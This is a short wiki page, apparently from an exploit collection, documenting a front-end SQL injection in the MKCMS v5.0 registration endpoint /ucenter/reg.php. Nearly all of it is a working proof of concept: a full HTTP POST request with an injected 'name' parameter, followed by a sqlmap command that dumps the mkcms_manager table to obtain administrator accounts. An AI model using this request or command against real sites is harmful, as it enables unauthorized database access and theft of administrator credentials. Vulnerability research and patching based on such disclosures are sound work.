Difference between revisions of "MKCMS v5.0 /ucenter/reg.php前台sql注入漏洞"

From PwnWiki
(Created page with "<languages /> <translate> ==漏洞影響== </translate> MKCMS v5.0 ==POC== <pre> POST /ucenter/reg.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac...")
 
(Marked this version for translation)
 
Line 1: Line 1:
 
<languages />
 
<languages />
 
<translate>
 
<translate>
==漏洞影響==
+
==漏洞影響== <!--T:1-->
 
</translate>
 
</translate>
 
MKCMS v5.0
 
MKCMS v5.0
Line 24: Line 24:
  
 
<translate>
 
<translate>
 +
<!--T:2-->
 
獲取管理員帳號
 
獲取管理員帳號
 
</translate>
 
</translate>

Latest revision as of 14:52, 10 July 2021

Other languages:
Chinese

漏洞影響

MKCMS v5.0

POC

POST /ucenter/reg.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/ucenter/reg.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 52
Connection: close
Cookie: PHPSESSID=cb8e6ccde6cf9050972fa9461d606be3
Upgrade-Insecure-Requests: 1

name=test' AND 1=1 AND 'inject'='inject&email=sss%40qq.com&password=ssssss&submit=

獲取管理員帳號

sqlmap -r inject.txt -D mkcms -T mkcms_manager --dump